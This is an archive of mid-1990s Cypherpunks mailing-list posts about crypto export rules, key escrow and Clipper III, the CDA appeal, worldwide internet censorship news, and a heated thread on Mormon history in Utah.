>>*   of such vehicle, be considered an export for purposes of this
>>*   subchapter.  Most of the requirements of this subchapter relate
>>    only to exports, as defined above.  However, for certain limited
>>    purposes, the controls of this subchapter apply to sales and other
>>    transfers of defense articles and defense services (see, e.g., Sec.
>>    126.1) of this subchapter."
>
>
>Okay, everybody, call Estes!  We've got some crypto to export...er...launch!


For some reason I'm getting a very comical picture here of a Crypto-CD inside
one of those cylindrical oatmeal boxes with about 50 F model-rocket engines
strapped to it....

Now, if you could just hit Airforce 1 on the way over - call it sending a
message.

#  Chris Adams <adamsc@io-online.com>   | http://www.io-online.com/adamsc/adamsc.htp
#  <cadams@acucobol.com>		 | send mail with subject "send PGPKEY"
"That's our advantage at Microsoft; we set the standards and we can change them."
   --- Karen Hargrove, Microsoft (quoted in the Feb 1993 Unix Review editorial)






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tom Lojewski <lojewski@andorra-c.it.earthlink.net>
Date: Thu, 3 Oct 1996 18:42:38 +0800
To: cypherpunks@toad.com
Subject: Utah as a Religious Police State
Message-ID: <1.5.4.32.19961003080718.006b817c@mail.earthlink.net>
MIME-Version: 1.0
Content-Type: text/plain


How do I get *off* this list?!!

>Date: Wed, 2 Oct 1996 08:47:56 -0700 (PDT)
>From: "John C. Randolph" <jcr@idiom.com>
>To: cypherpunks@toad.com
>Subject: Utah as a Religious Police State
>X-Newsreader: NN version 6.5.0 #1 (NOV)
>Sender: owner-cypherpunks@toad.com
>
>
>Moroni says:
>
>>I never cease to be surprised by the interest that gentiles show
>>in working mormon communities while totally neglecting their own
>>failing areas.
>
>I don't do a lot of nit-picking on this mailing list, but:
>
>I am a Jew. *You* are a gentile. So are all the rest of the mormons.
>Get this point straight.
>
>-jcr
>
>
>
>
>

---------------------------------------------------------
Tom Lojewski - ProNet Consulting - lojewski@earthlink.net





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dustman@athensnet.com (Anonymous)
Date: Thu, 3 Oct 1996 18:47:31 +0800
To: cypherpunks@toad.com
Subject: Re: FUCK!!!!!!;-)
In-Reply-To: <v03007800ae787c226c62@[206.119.69.46]>
Message-ID: <199610030803.EAA18153@porky.athensnet.com>
MIME-Version: 1.0
Content-Type: text/plain


+ --- begin forwarded text
+ 
+ "Keys" are strings of computer code that lock and unlock data.   Key recovery
+ is an approach that permits the recovery of lost or  damaged keys without the
+ need to store or "escrow"  them with a third party.  This approach could also
+ meet the needs of law enforcement to act under the authority of a court order
+ without risking the  confidentiality of business data.

Just wondering how much of a problem "damaged keys" really are in
practice.  Is this something specific to Microsoft filesystems or
really cheap tape drives?  I've never seen that problem under Unix,
and something like a private RSA key doesn't change very often, so you
would expect to have encrypted copies of it on many backup tapes.

Or maybe this journalist, like most, doesn't know what the fuck he's
talking about?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@well.com>
Date: Thu, 3 Oct 1996 22:57:47 +0800
To: cypherpunks@toad.com
Subject: Justice Dept completes second phase of CDA appeal, from HotWired
Message-ID: <Pine.GSO.3.95.961003044824.3619D-100000@well.com>
MIME-Version: 1.0
Content-Type: text/plain




---------- Forwarded message ----------
Date: Thu, 3 Oct 1996 04:47:33 -0700 (PDT)
From: Declan McCullagh <declan@well.com>
To: fight-censorship@vorlon.mit.edu
Subject: Justice Dept completes second phase of CDA appeal, from HotWired

http://www.hotwired.com/netizen/96/40/special3a.html

HotWired, The Netizen
3 October 1996

CDA and the Supremes

by Declan McCullagh (declan@well.com)
Washington, DC, 2 October

   Racing against a midnight deadline, the Justice Department late
   Monday evening completed the second phase of its appeal to the Supreme
   Court after its initial loss in the Communications Decency Act
   lawsuit.

   The solicitor general only has to argue in the 28-page jurisdictional
   statement that there's a substantial constitutional issue at stake in
   this lawsuit - something transparently obvious to anyone who's been
   following the CDA court battle.
                   
   The next move is up to the attorneys from the American Civil Liberties
   Union and the American Library Association. They plan to file a motion
   asking the High Court to uphold the Philadelphia court's decision
   without scheduling a full hearing.

   Chris Hansen, who heads the ACLU legal team handling the CDA case,
   says that if the Supreme Court grants their motion, it would
   effectively be saying "the lower court was so deeply correct" that the
   justices don't need to learn more about the case. As a legal tactic,
   it means the more censor-happy justices couldn't water down the
   Philadelphia judges' unanimous decision upholding free speech online.
   "Anytime the Supreme Court decides the case with a full briefing,
   there's no guarantee that we'll win - or win in the same terms,"
   Hansen says.
           
   But because this is a precedent-setting and controversial lawsuit, the
   Supremes almost certainly will want to hear the appeal themselves.
   When the justices place this case on the court's calendar, they'll
   likely give both parties a few months to file the next stage of the
   lawsuit, which will be a strained and torturous collection of
   arguments from the government trying to explain why the lower court
   was wrong. Then oral arguments will be held next spring.
   
   The solicitor general's jurisdictional statement itself largely
   summarizes the arguments the government has already made. It does
   additionally argue, however, that a cable television indecency case
   the High Court decided after the June CDA decision buttresses the
   government's defense of the law:
   
    "Because the CDA's definition of indecency is almost identical to the
     decision [the Supreme Court] upheld against a vagueness challenge ...
     that decision reinforces the conclusion that the CDA's restrictions
     are not unconstitutionally vague."
   
   Not so, says the ACLU's Hansen: "Even if that were true, it wouldn't
   change the result in our case. All three judges in our case thought
   the CDA was flawed in other ways besides vagueness."
                         
   The government also cites the Shea v. Reno lawsuit - a weaker case
   that challenges half of the CDA - that Joe Shea filed in Manhattan
   earlier this year on behalf of his online publication, the American
   Reporter. Shea won only a partial victory on 29 July, which the DOJ is
   now exploiting: "The three-judge court in Shea v. Reno ... held that
   the CDA's definition of indecency is not unconstitutionally vague. The
   district court in this case erred in reaching a contrary conclusion."
       
[...]







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jonathon <grafolog@netcom.com>
Date: Thu, 3 Oct 1996 20:26:42 +0800
To: Steve Schear <azur@netcom.com>
Subject: Re: How might new GAK be enforced?
In-Reply-To: <v02130503ae781347afee@[10.0.2.15]>
Message-ID: <Pine.SUN.3.95.961003045215.14505G-100000@netcom7>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 2 Oct 1996, Steve Schear wrote:

> Another possible monkey wrench is to send non-GAK messages containg random
> data.  Since the entropy of encrypted and RNG data should be identical you

	Send things like the contents of  alt.binary.pictures.something
	only use every other line of the encoded material in them.

	Intersperse that with your normal e-mail, and never have
	headers for anything.    

	And lets not forget that alt.binary.pictures.something is a
	great place to send/recieve encrypted messages that 99.99%
	of the viewers won't realize are encrypted messages.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@well.com>
Date: Fri, 4 Oct 1996 02:37:35 +0800
To: cypherpunks@toad.com
Subject: Net-freedom roundup: Algiers, Malaysia, Burma, Hong Kong...
Message-ID: <Pine.GSO.3.95.961003055942.16602C-100000@well.com>
MIME-Version: 1.0
Content-Type: text/plain




---------- Forwarded message ----------
Date: Thu, 3 Oct 1996 05:59:08 -0700 (PDT)
From: Declan McCullagh <declan@well.com>
To: fight-censorship@vorlon.mit.edu
Subject: Net-freedom roundup: Algiers, Malaysia, Burma, Hong Kong...

[Update on situations in Algiers, Malaysia, Burma, Singapore,
European Union, U.K., Hong Kong, China, and Germany. More at
http://www.eff.org/~declan/global/ --Declan]

********

   SUSPENDED ALGERIAN DAILY OFFERED INTERNET PAGE
   Copyright 1996 Reuter Information Service

   PARIS (Sep 30, 1996 1:24 p.m. EDT) - A press freedom watchdog on
   Monday offered the suspended Algerian daily La Tribune a page on its
   Internet site to give it an airing during the six-month ban.
   
   "Thanks to this initiative, these journalists, banned from writing by
   the Algerian authorities, will be able to practice their trade again,"
   the Paris-based Reporters without Borders (RsF) said.
   
   An Algiers court suspended La Tribune for six months on September 3
   over a cartoon mocking the Algerian flag.
   
[...]

   Fifty-seven journalists have been murdered by suspected rebels. RsF
   said authorities had suspended or seized newspapers on 55 occasions
   and 23 journalists had been held for more than 48 hours since the
   conflict broke out over the 1992 cancellation of a general election
   fundamentalists were poised to win.
   
********

         UNITED NATIONS, Sept 27 (Reuter) - Malaysia's prime
minister accused the West on Friday of spreading smut and
violence, particularly on the Internet.
         In his speech to the U.N. General Assembly, Mahathir bin
Mohamad said that although the information age facilitated
worldwide knowledge, it also demeaned moral values.
         ``Smut and violence gratuitously distributed by criminals
in the North is no less polluting than carbon dioxide
emissions nor less dangerous than drug trafficking.''
         In a reference to the United States he said if one great
power could apply its laws to citizens of another country for
drug trafficking ``why cannot countries with different moral
codes extradite the traffickers of pornography for legal
action?''
         ``Before the whole world sinks deeper into moral decay, the
international community should act. Abuse of the ubiquitous
Internet system must be stopped,'' he said.
         Politically, he said the monopoly of the West's electronic
media should be broken on so-called world news networks.
         ``Not only are distorted pictures of our countries being
broadcast but our own capacity to understand what is happening
is being undermined,'' he said.

[...]
         ``It is boring almost. And yet nothing much has been done
which could bring about amelioration of this sad state of
affairs, `` he said.

*********

RANGOON, BURMA, 1996 SEP 27 (NB) -- Burma has made owning, using,
importing or borrowing a modem or fax machine without government
permission a crime, punishable by up to 15 years in jail,
according to a report by United Press International.

Burma's military government has imposed what's called "The
Computer Science Development Law" which empowers the Ministry of
Communications, Posts and Telegraphs to specify what exactly can
be restricted, UPI reports.

UPI quotes the government-run newspaper New Light of Myanmar as
saying the same punishment is prescribed for anyone who sets up a
link with a computer network without the prior permission of the
ministry, or who uses computer network and information technology
"for undermining state security, law and order, national unity,
national economy and national culture, or who obtains or
transmits state secrets."

UPI reports that in July a diplomat, Leo Nichols, died in prison
after he was sentenced to a lengthy term for illegal possession
of fax machines.

***********

        SINGAPORE, Sept. 28 (UPI) -- Internet users in Singapore are
complaining that a new system to police the massive global
communications network is slowing down access to websites rather than
speeding it up as promised by government officials, news reports said
Saturday.
        Earlier this month, special computers called proxy servers began
censoring all requests for websites from Singapore Internet users,
blocking access to those deemed ``objectionable'' by the government.
        The proxy servers, which began regulating cyperspace Sept. 15, delay
access to the Internet because they first have to check a list of banned
websites before retrieving requested homepages, the Straits Times
reported.
        ``I've found that it can take twice as long to access the sites I
commonly access,'' said Teo Mei Chin, a 22-year-old undergraduate.
        Users pointed out that slower access translated into longer on-line
time and higher telephone bills.
        Although many Internet subscribers in the tightly-controlled city-
state anticipated such delays under the new system, the Singapore
Broadcasting Authority assured users access to certain websites would
actually be quicker since the proxy servers are able to store frequently
requested homepages.
        But Internet users say the filter computers also are dishing up
outdated homepages.
        Walter Wu, who uses the Internet for up-to-date stock market and
business data, said some financial websites he requested were at least a
day old.

[...]

***********

LONDON, ENGLAND, 1996 SEP 27 (NB) -- By Steve Gold. The British
government has added its support to plans to handle the problem of
child pornography on the Internet. The proposals, which have been
drawn up by the Home Office with assistance from Peter Dawe, the
founder of Pipex, the UK's largest Internet service provider (ISP),
are known as Safety Net.

According to Dawe, recent discussions in the industry, culminating in
a letter from the police to the various ISPs in the UK, has meant
there is considerable pressure on the ISP industry to exercise a
degree of self-regulation.

"Public opinion said that something had to be done. I came to the
conclusion that it was going to be impossible to establish industry-
wide consensus on how to tackle this issue," he said, adding that the
idea of Safety Net is gathering support in the UK ISP community.

According to Dawe, Safety Net has the backing of the Internet Service
Provider's Association (ISPA), as well as the London Internet
Exchange, two groups which claim to represent most of the ISPs
currently operating in the UK.

[...]

Quite how the ISPs will tackle the problem, such as blocking access to
those Web pages, remains to be seen, but Dawes claims that the ISPs
will have no excuse in law of being unaware of offending Web pages and
Usenet newsgroups.

[...]

**********

         BRUSSELS (Reuter) - European Union telecommunications
ministers, reacting to a child-sex scandal in Belgium, pledged
Friday to consider ways to keep illegal material that could harm
children off the Internet.
         Belgian Telecommunications Minister Elio Di Rupo announced
that his government planned to implement new measures requiring
Internet access providers to monitor and report material
featuring sexual abuse or exploitation of children.
         He asked his colleagues to join forces with him.
         ``Today a big legal vacuum exists, for legislation is
falling behind technological evolution,'' he said, according to
a speaking note that was distributed to reporters.
         ``There is a big risk that it will create an enormous market
of children fed on by criminals.''
         The ministers agreed to expand a working party that has
already been set up to look at the question of illegal material
on the Internet and asked it to come up with concrete proposals
before they meet again in November.
         The group will include representatives of the 15 EU telecoms
ministries and of companies that provide access to online
services or prepare the content, a statement adopted by the
ministers said.
         The accord follows an agreement by EU justice ministers in
Dublin Thursday to extend the scope of the EU police agency
Europol so it can fight the sex trade in women and children. The
moves come in the wake of the discovery in Belgium of a
paedophile network and the murders of four young girls.
         But some of the telecoms ministers, including those from
Britain and Sweden, warned that the EU could not wander into
censorship and had to focus on fighting truly illegal material.

[...]

********

CENTRAL, HONG KONG, 1996 SEP 26 (NB) -- By Eric Lai. A Hong Kong
Internet enthusiast is claiming that his Web site, featuring
sexually suggestive photos of himself, was forcibly removed by his
Internet service provider (ISP) two days ago in a seeming act of
premature censorship.

Donald Tu, 32, is a former radio and TV presenter and aspiring
bodybuilder and model. In May, he put up his Web site,
http://members/hknet.com/~hkstud/ , which featured photos of himself
topless, often wearing nothing more than wet, slightly transparent
briefs, posing in a studio and outdoors at scenic locations around
Hong Kong.

Tu, who was interviewed on last night's premiere of the Dataphile
On-Air radio show, says his site has received thousands of "hits"
coupled with encouraging e-mail, especially after a local Chinese
language newspaper on September 17 reviewed his Web site.

But a single complaint outweighs those thousands of positive comments,
at least according to his Web host, HKNet. After receiving a single
complaint from a member of the public, HKNet wrote to Tu on Tuesday
that "the government may take action against the site because of its
content and 'exposure,' based on the letter of the law governing
obscene and indecent materials, and recent experiences in its
enforcement. Therefore, we have made the decision to bar access to
the questionable materials for the time being."

But ISPs which censor and regulate content are not currently being
compelled by the government, according to a spokesperson at the
Broadcasting, Culture, and Sport Branch. The Branch has been devising
Internet content regulations all summer which should be announced
soon.

[...]

*********

         BEIJING, Sept 27 (Reuter) - China's Communist Party chief
Jiang Zemin moved on Friday to tighten the communists' grip on
the state media and to strengthen his position with a blaze of
publicity before a party plenum.
         He used a visit to the Beijing offices of the People's
Daily, the party mouthpiece, to deliver a hardline speech on the
importance of maintaining communist control of all media, the
newspaper reported, splashing the news and three photographs of
Jiang across its front page.
         Diplomats said the speech by Jiang was aimed at bringing
back into line Chinese writers and more daring media
organisations that have tried to push the limits of propaganda

[...]

         ``Historical experience has proved repeatedly that whether
guidance of news is right or wrong has to do with the party
growing strong ... the solidarity of the people and the
prosperity of the nation,'' Jiang said.

[...]

********

HotWired                
27-29 Sept 96    
The Netizen
   
   by Wendy Grossman
   London, 26 September
                 
   Last Monday, a unified front of British police, government, and
   representatives of leading ISPs announced proposals for cracking down
   on illegal material available on the UK's portion of the Internet. The
   first target is child pornography, but the protagonists have already
   said they've set their sights on other types of illegal material such
   as copyright violations, obscenity, and possibly hate speech.
   
   Called R3/Safety-Net, the proposals were presented to the media by
   Science and Technology Minister Ian Taylor and representatives from
   the Internet Service Providers' Association (ISPA), the London
   Internet Exchange (LINX), and the Home Office, which is the government
   department charged with law enforcement.

[...]
   
   As it turns out, Demon and the Department of Trade and Industry had
   been talking without publicity for months about taking action against
   obscenity on the Net. But the media raised the pressure, as did       
   complaints on uk.censorship about a list of 133 newsgroups that
   Superintendent Mike Hoskins of the Clubs and Vice unit of the
   Metropolitan Police had sent ISPs as a guide to the location of
   illegal material. Hoskins and the ISPs all swear no threat was
   intended or taken, but the underlying tone was still: You do something
   about it, or we'll do something about it. R3/Safety-Net is that
   something.

[...]
                 
   No one is going to oppose these measures. How can they, when the 1994
   revision of the Criminal Justice Bill allows the police to arrest,
   without warrant, people suspected of obscenity and certain child
   pornography offenses? Child pornography is, of course, illegal to
   create, distribute, or possess in Britain. For the purposes of the
   Obscene Publications Act and the Protection of Children Act, if
   something looks like a child in a sexual act, it is child pornography.

[...]

   So it seemed like with Monday's announcement, everybody wins - almost.
   The government gets to look like it's doing something big. The ISPs
   get to stay out of jail. The police get to arrest people. Peter Dawe  
   gets to be a hero. Britain gets to be a world leader. And we get ...
   well, what do we get? We get the certain knowledge that they will not
   stop here. They have already said so. Books like the Anarchist's      
   Cookbook are banned here in print, and in a country where last Monday
   police seized a massive haul of IRA explosives intended to rearrange 
   the landscape, the argument for letting people read 
   alt.engr.explosives is likely to lead to the withdrawal of reference
   books from the public libraries. Britain has an Official Secrets Act,
   not a Freedom of Information Act.
   
   Government can proceed only with the consent of the governed, and on  
   Monday what that unified panel asked for was our trust. They will not
   censor free speech; it's just the small percentage of illegal stuff
   they want cleaned up. So we're left asking before every move, "Daddy,
   is this illegal?" 

**********
   
Subject: Germany Bans Web Pages for Minors - and ALL
To: fight-censorship@vorlon.mit.edu
Date: Mon, 30 Sep 1996 13:37:52 +0100 (MET)
Reply-To: um@c2.net (Ulf Moeller)
Organization: private site, Hamburg (Germany)
From: um@c2.net (Ulf Moeller)

The report is essentially correct. In Hamburg, the prosecutors
decided themselves that AOL had done nothing illegal, so as far as I
know there was no court decision.

Also, it appears that said Federal Office is neither responsible
for electronic nor for foreign publications. I think the minister
is trying to spead FUD.


>From: taxbomber@taxbomber.com
>Newsgroups: alt.censorship,alt.privacy,alt.security,news.admin.censorship
>Subject: Germany Bans Web Pages for Minors - and ALL
>Date: Sat, 28 Sep 1996 06:46:58 GMT
>Message-ID: <324cc9c7.7567566@news.c2.net>
>NNTP-Posting-Host: md19-017.compuserve.com

According to Germany's leading tabloid paper "Bild" (Saturday
edition), Federal Minister for Familiy Affairs, Claudia Nolte
(Christian-Democrat), in an unprecedented decision
has formally had several Web pages banned
for being "X"-rated by the "Federal Office for the Evaluation
of Literature Hazardous to Minors".

These are pages featured by Ernst Zuendel, a leading political
revisionist located in Canada whose purportedly "Neo-Nazi"
views have been the subject of much controversy in Germany.

Ms Nolte is quoted as saying: "It is not tolerable that the
Internet should be an island with special privileges, on which
thoughtless or unscrupulous providers may pursue their infamous
activities  with impunity."

This effectively forces Internet providers to restrict minors' 
access to said pages - a technical impossibility since most
minors accessing the net are be using their parents' accounts.

No "Netwatch" or other self-censorship software will
suffice to conform with this provision, as it is THE PROVIDERS,
not the kids' legal guardians who have to comply with this
restriction.

Following a recent decision by the State of Hamburg's Supreme
Constitutional Court to the effect that service providers cannot be
held responsible for possibly illegal contents of data transfers
via their networks (here, AOL was accused of disseminating 
child pornography),  this move must be regarded as a circumvention
tactics to put the thumbscrews on ISPs nevertheless by invoking
Minors Protection legislation instead. 

(Also note that the Hamburg decision ruled that email message were
protected by privacy laws as any snail mail letter - hence, providers
could not be expected to monitor their contents as this would
violate constitutional rights.)

This implies that German based ISPs (including AOL's and Compuserve's
local services) will actually have to ban ALL GENERAL  access to the
Zuendel pages from their systems unless they are willing to risk
running afault of the law.

********

[Posted to soc.culture.singapore through an anonymous remailer in\
Germany. No wonder the SBA wants to censor the Net! --Declan]


Mon, 23 Sep 1996 01:32:06    soc.culture.singapore          Thread  228 of  350
Lines 18                      SBA is screwed!!              No responses
mix@squirrel.owl.de                                           Squirrel Remailer

            __                __                __
         __/o \_           __/o \_           __/o \_
         \____  \          \____  \          \____  \
             /   \             /   \             /   \
       __   //\   \      __   //\   \      __   //\   \
    __/o \-//--\   \_/__/o \-//--\   \_/__/o \-//--\   \_/
    \__SBA ___  \  |  \__ISP ___  \  |  \__PAP ___  \  |
         ||   \ |\ |       ||   \ |\ |       ||   \ |\ |
        _||   _||_||      _||   _||_||      _||   _||_||

  #### #  # #### #  #     ##### #  # ####      ### ###   ##
  #    #  # #    # #        #   #  # #        #    #  # #  #
  #### #  # #    ##         #   #### ####     #### ###  ####
  #    #  # #    # #        #   #  # #           # #  # #  #
  #    #### #### #  #       #   #  # ####     ###  ###  #  #


###






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Deana Holmes" <mirele@xmission.com>
Date: Thu, 3 Oct 1996 23:29:20 +0800
To: cypherpunks@toad.com
Subject: Re: [FACTS] Mountain Meadows Massacre
Message-ID: <199610031213.GAA16253@mail.xmission.com>
MIME-Version: 1.0
Content-Type: text/plain


On  3 Oct 96 at 8:58, attila wrote:

> AFTER THIS POST, ALL RELIGION MUST GO OFF THE LIST! see banner below

attila, if you wouldn't post propaganda from the Church, then I 
*might* agree with you.  But you can't do that and expect those of us 
who know better to keep quiet.

<snip Dmitri Vulis nonsense>

> Now, concerning the completely ignorant, erroneus, and  slanderous
> comment of Dimitri, the facts will follow the usual disclaimer:
> 
>     ***************************************************************
>         I am neither an authority of nor a representative of "The Church
>     of Jesus Christ and the Latter Day Saints" of which our current
>     living Prophet, President Gordon B. Hinckley, is the sole authority
>     to this world.

Love your CYA statement, dude.  It's terribly doubtful that Hinckley 
knows the details of Mountain Meadows, or that he would want to 
discuss them, if he did.

>  I do not speak for the Church, nor am I a recognized
>     historian and/or spokesman for the Church.  Any opinions stated
>     herein are my viewpoints as discerned from my studies of religion,
>     in particular the historical aspect of the Church, and I accept all
>     responsibilty for same.

Very good.  You know, of course, that if you say the wrong thing in 
public, that your fate will be that of D. Michael Quinn, the 
excommunicated Mormon historian, who lost his Church membership 
because he would not stop telling unpleasant truths about the 
Church's early history.  Just so the other c-punks know that speaking 
truth has consequences.

     ******************************************************************* 
>     If some of the list wish to either ask questions RESPONSIBLY or
>     conduct a shared learning experience of the Mormon religious,
>     community, and work ethic, please drop me a personal note, and
>     I will both answer reasonable questions, and serve as moderator
>     of a list if there is sufficient interest.  I think the libertarian faction 
>     in particular might be both surprised and *stunned* by many of 
>     the actual conditions in Utah versus preconceived views.
>     *******************************************************************

If anyone wants a more jaundiced view of Utah, please drop me a line. 
I can be a Utah cheerleader if I want (there are many good things 
about living here) but the fact of the matter is that we live in a 
Church State.  I resent the fact that the dominant religion seems to 
want to tell *everyone* here how to live their lives.

> 
> now, back to our regularly scheduled programming <g>
> 
> the following is a compilation of information which is as 
> reasonable a representation of the foul deed as I could assemble.

<snip>

I would suggest two books, both by historian Juanita Brooks:

"The Mountain Meadows Massacre"
"John D. Lee"

Before the days of Boyd K. Packer, historians weren't excommunicated. 
Mrs. Brooks' punishment for writing these two books was to be shunned 
in her southern Utah community.  But they remain *the* sources on 
Mountain Meadows and the general attitude of the people at the time.

I notice that attila didn't mention these sources.

Deana (who doesn't really approve of the pap that passes for history 
in orthodox LDS circles)

Deana M. Holmes
April 1996 poster child for clueless $cientology litigiousness
alt.religion.scientology archivist since 2/95
mirele@xmission.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@eff.org>
Date: Fri, 4 Oct 1996 01:29:18 +0800
To: Jim McCoy <mccoy@communities.com>
Subject: Re: Fighting Clipper III
In-Reply-To: <v03007802ae791065bbd7@[205.162.51.35]>
Message-ID: <Pine.SUN.3.91.961003063629.18620C-100000@eff.org>
MIME-Version: 1.0
Content-Type: text/plain


You'll have trouble doing a successful boycott of RSA. What, you won't 
use Netscape Navigator or PGP?

-Declan


On Wed, 2 Oct 1996, Jim McCoy wrote:

> Rich Burroughs <richieb@teleport.com> wrote:
> [...]
> >>>On Wed, 2 Oct 1996, John Young wrote:
> >>>
> >>>>    The New York Times, October 2, 1996, pp. D1, D8.
> >>>>    Executives of the International Business Machines
> >>>>    Corporation said late yesterday that they were still lining
> >>>>    up the final list of companies in the alliance. Those
> >>>>    involved will include Digital Equipment and smaller
> >>>>    data-security companies including RSA Data Security, Cylink
> >>>>    and Trusted Information Systems.
> >>>
> >>>We are in deep trouble.
> >>
> >>Wouldn't a letter-writing campaign be in order here?
> >[snip]
> >
> >The word "boycott" leaped into my mind.  I personally do not believe that I
> >will be buying products from any of these companies, as long as thay
> >participate in this GAK charade.
> 
> Such an initiative will need publicity and letter-writing early in the
> campaign will help us set the tone and points of debate on this issue.
> A boycott works best when everyone knows why and there are a few key
> phrases which can be used to get the message across.  Something like
> "company X is helping build big brother, boycott their products" or a
> few similar sound bites are needed fast.  The big brother inside stickers
> from the last campaign were nice, maybe people can come up with variations
> of various corporate logos or marketting phrases which help get the message
> across?
> 
> jim
> 
> 


// declan@eff.org // I do not represent the EFF // declan@well.com //






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Thu, 3 Oct 1996 22:05:19 +0800
To: cypherpunks@toad.com
Subject: Re: FUCK!!!!!!;-)
In-Reply-To: <v03007800ae787c226c62@[206.119.69.46]>
Message-ID: <v03007807ae794af7bec3@[206.119.69.46]>
MIME-Version: 1.0
Content-Type: text/plain


At 4:05 am -0400 10/3/96, Anonymous wrote:
> Or maybe this journalist, like most, doesn't know what the fuck he's
> talking about?

Actually, since this was something off of Business Wire, the "journalist"
was actually a PR flack. Worse.

A joke about smearing clue musk and standing in a heard of clues comes to
mind...

Cheers,
Bob



-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"'Bart Bucks' are not legal tender."
                -- Punishment, 100 times on a chalkboard,
                       for Bart Simpson
The e$ Home Page: http://www.vmeng.com/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Thu, 3 Oct 1996 21:47:16 +0800
To: Remo Pini <rp@rpini.com>
Subject: Re: Fw: Re: ITAR satellite provision
In-Reply-To: <9610030712.AA02002@srzts100.alcatel.ch>
Message-ID: <Pine.SUN.3.94.961003071638.17409D-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 3 Oct 1996, Remo Pini wrote:

> -----BEGIN PGP SIGNED MESSAGE-----
> 
> Mime-Version: 1.0
> Content-Type: text/plain
> Content-Transfer-Encoding: 7bit
> 
> To: cypherpunks@toad.com
> Date: Thu Oct 03 08:09:13 1996
> 
> - -----Begin Included Message ----- 
> 
> Date: 
>  From: 
> To: jimbell@pacifier.com
> Cc: 
> 
> To: jimbell@pacifier.com
> Date: Thu Oct 03 08:08:42 1996
> > >*   A launch vehicle or payload shall not, by reason of the launching
> > >*   of such vehicle, be considered an export for purposes of this
> > >*   subchapter.
> > Okay, everybody, call Estes!  We've got some crypto to export...er...laun
> > ch!
> If I get the above wording correctly (unicorn, help me!), it is sufficient 
> to put the cryptostuff on a disc in a LAUNCHABLE device, it never says that 
> the payload has to be delivered by air. So, just put that thing in a bag 
> and get it through customs... (or does "by reason of ..." mean that the 
> exclusive means of export allowed is launching ?)

The launching alone will not cause it to be an export.  If it is launched
and then ends up outside the U.S., it could be an export.  Certainly if it
is launched with the purpose of exporting crypto, it will be an export.


> 
> remo pini
> 
> - ------< fate favors the prepared mind >------
> Remo Pini                        rp@rpini.com
> PGP:  http://www.rpini.com/crypto/crypto.html
> - ----< words are what reality is made of >----
> 
> - ---- End of forwarded message ----
> - ------< fate favors the prepared mind >------
> Remo Pini                        rp@rpini.com
> PGP:  http://www.rpini.com/crypto/crypto.html
> - ----< words are what reality is made of >----
> -----BEGIN PGP SIGNATURE-----
> Version: 2.6.3i
> Charset: noconv
> Comment: http://www.rpini.com/crypto/crypto.html
> 
> iQEVAwUBMlNYihFhy5sz+bTpAQFnxwf/dvzBi/4wSb2IRUJfrpWGtIiHeq+BODKO
> p+4P1Lqqh5aPPyjI38I8M0d7/KBrpIHAveQ7UNo2W42WrDHgieFJV55c0H8Envj/
> +FOJu9KLR9Z6bQ327jYjmKCTbfdveRiZQX++/4eSud+LMtkByCzLv8IsGPjvKeTw
> 6fBxH1Zq0EUJuOGNFUx8hCqe6IssYyrr99DLFisfxdAFBdo5lP0ujNzQ/ov4iqki
> qnFBugIViHikldzbq9e7KnASKP4RhkwAYpnJ85dlHCv8yJF3yjgItf6jSPG48/Xp
> PkNa4bfp3LhpCRD8AEus/RNxpds28mUIktDluWgHuqP9Gy0ZI9xmpw==
> =JOUm
> -----END PGP SIGNATURE-----
> 
> 

--
I hate lightning - finger for public key - Vote Monarchist
unicorn@schloss.li





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Thu, 3 Oct 1996 22:39:51 +0800
To: richieb@teleport.com (Rich Burroughs)
Subject: Re: NYT on IBM GAK
In-Reply-To: <3.0b24.32.19961002181037.0067e434@mail.teleport.com>
Message-ID: <199610031251.HAA29882@homeport.org>
MIME-Version: 1.0
Content-Type: text


Rich Burroughs wrote:

| The word "boycott" leaped into my mind.  I personally do not believe that I
| will be buying products from any of these companies, as long as thay
| participate in this GAK charade.

	Folks,

	Lets be reasonable.  Its time to jump on board the GAK
bandwagon.  After all, where better to disrupt the music?  We need to
start writing GAK software, and it better be up to the high standards
that the NSA sets for itself.

	Once we've written it, and its being distributed, we can say
'See, another broken bit of GAK software.  Not even the NSA could get
it right.  Our data is too important to be using broken software to
protect us.'

	And we have 56 bit exportability in hand.


Adam

-- 
"Every year the Republicans campaign like Libertarians, and then go to
Wasthington and spend like Democrats."

Vote Harry Browne for President.  http://www.harrybrowne96.org







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Thu, 3 Oct 1996 22:43:42 +0800
To: hua@chromatic.com (Ernest Hua)
Subject: Re: Clipper III on the table
In-Reply-To: <199610021904.MAA06902@server1.chromatic.com>
Message-ID: <199610031305.IAA29915@homeport.org>
MIME-Version: 1.0
Content-Type: text


Ernest Hua wrote:

| Therefore, it is definitely in IBM's and HP's interest to build
| systems that the government likes.  It is also important for them to
| point out that such systems are very vulnerable given the previous
| policies.  This new GAK ("GAKR"??) will actually be quite appropriate
| in terms of a right "balance" for the financial sector.  In fact, I
| would expect the financial sector to have to open its transactions to
| not just the FBI/CIA/DEA, but the SEC and other non-law-enforcement
| agencies.

	The financial industry doesn't need GAK, the SEC, FINCEN et al
already get full access to their networks & data.  The financial
industry is very cooperative about this.  As such, GAK is adding
(unquantifiable) risk to their plans, without giving the LEAs
anything.  I am suggesting to my customers in the financial sector
that they continue moving towords 3des, and only look at this as an
alternative to foreign software for their overseas branches.

	Remember, banks already get a partial exemption to the ITARs.

Adam

-- 
